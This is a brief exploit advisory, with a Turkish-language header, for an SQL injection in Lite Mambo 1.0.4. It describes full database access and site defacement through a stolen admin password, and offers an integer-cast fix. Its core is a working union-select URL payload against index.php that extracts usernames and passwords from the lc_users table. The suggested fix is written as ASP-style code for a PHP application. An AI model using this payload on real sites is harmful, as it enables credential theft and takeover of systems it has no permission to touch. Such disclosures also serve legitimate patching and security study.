< ------------------- header data start ------------------- >

#############################################################

# Application Name : Lite Mambo 1.0.4

# Vulnerable Type : SQL Injection

# Infection : Yönetici bilgileride dahil olmak üzere veritabanindaki tüm verilere erisim saglanabilir. Elde edilen Yönetici sifresi ile sisteme giris yapilarak haber vb. içerik eklemek suretiyle ilgili site ana sayfasi yönlendirilerek hack edilebilir.

# Bug Fix Advice : id degiskeni sadece Integer deger alacak sekilde düzenlenmelidir.
Ilgili Güvenlik açiginin kapatilmasi için Örnek Kod: id = Cint(Request.QueryString(id))

# author : code Hunters TIM

#############################################################

< ------------------- header data end of ------------------- >



< -- bug code start -- >

/index.php?option=downloads&catid=2700+union+select+1,concat_ws(0x3a,username,password),3+from+lc_users+--+

< -- bug code end of -- >